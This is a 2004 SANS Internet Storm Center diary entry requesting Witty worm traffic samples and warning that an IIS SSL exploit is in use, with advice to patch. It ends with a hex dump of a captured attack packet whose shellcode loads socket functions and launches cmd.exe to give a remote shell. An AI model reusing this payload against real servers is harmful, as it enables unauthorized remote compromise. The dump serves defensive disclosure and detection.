Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2004-04-22 InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Witty Traffic Request / Mailbag

Published: 2004-04-22
Last Updated: 2004-04-23 01:17:46 UTC
by Pedro Bueno (Version: 1)
0 comment(s)
Witty Traffic Request
Witty came out 4 weeks ago. We do hear rumors of variants, but have no confirmation so far and would like to request traffic samples of unusual traffic with source port 4000.
Mailbag
Some users are already reporting the use of the IIS SSL exploit for remote compromise. However there is not sign of a worm yet. The reports are currently based on one known tool and this tool currently only targets English and German versions.
New tools are being released to explore the TCP and MS SSL vulnerabilities. Now that some virus are 'open source'(i.e. Phatbot), may be question of time to see it incorporated into them.

So, once again, patch your systems!
Reference: http://www.f-secure.com/weblog/
Sample Packet:
00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E ...THCOWNZIIS!2^

BE 98 EB 23 7A 69 02 05 6C 59 F8 1D 9C DE 8C D1 ...#zi..lY......

4C 70 D4 03 F0 27 20 20 30 08 57 53 32 5F 33 32 Lp...' 0.WS2_32

2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83 ED 2A .DLL........]..*

6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B 78 08 j0Yd...@..p...x.

8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B 1C 01 ._<.....[x...K..

F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB 31 C9 ..S$..SQR.[ ..1.

41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2 84 C0 A1...4....1.....

75 F7 0F B6 45 05 8D 44 45 04 66 39 10 75 E1 66 u...E..DE.f9.u.f

31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7 0C 4A 1.ZX^VPR+N.A...J

8B 04 88 01 F8 0F B6 4D 05 89 44 8D D8 FE 4D 05 .......M..D...M.

75 BE FE 4D 04 74 21 FE 4D 22 8D 5D 18 53 FF D0 u..M.t!.M".].S..

89 C7 6A 04 58 88 45 05 80 45 77 0A 8D 5D 74 80 ..j.X.E..Ew..]t.

6B 26 14 E9 78 FF FF FF 89 CE 31 DB 53 53 53 53 k&..x.....1.SSSS

56 46 56 FF D0 97 55 58 66 89 30 6A 10 55 57 FF VFV...UXf.0j.UW.

55 D4 4E 56 57 FF 55 CC 53 55 57 FF 55 D0 97 8D U.NVW.U.SUW.U...

45 88 50 FF 55 E4 55 55 FF 55 E8 8D 44 05 0C 94 E.P.U.UU.U..D...

53 68 2E 65 78 65 68 5C 63 6D 64 94 31 D2 8D 45 Sh.exeh\cmd.1..E

CC 94 57 57 57 53 53 FE C6 01 F2 52 94 8D 45 78 ..WWWSS....R..Ex

50 8D 45 88 50 B1 08 53 53 6A 10 FE CE 52 53 53 P.E.P..SSj...RSS

53 55 FF 55 EC 6A FF FF 55 E0 SU.U.j..U.
---------------------------------------------------------------

Handler on duty: Pedro Bueno (bueno_AT_ieee.org)
Keywords:
0 comment(s)
Diary Archives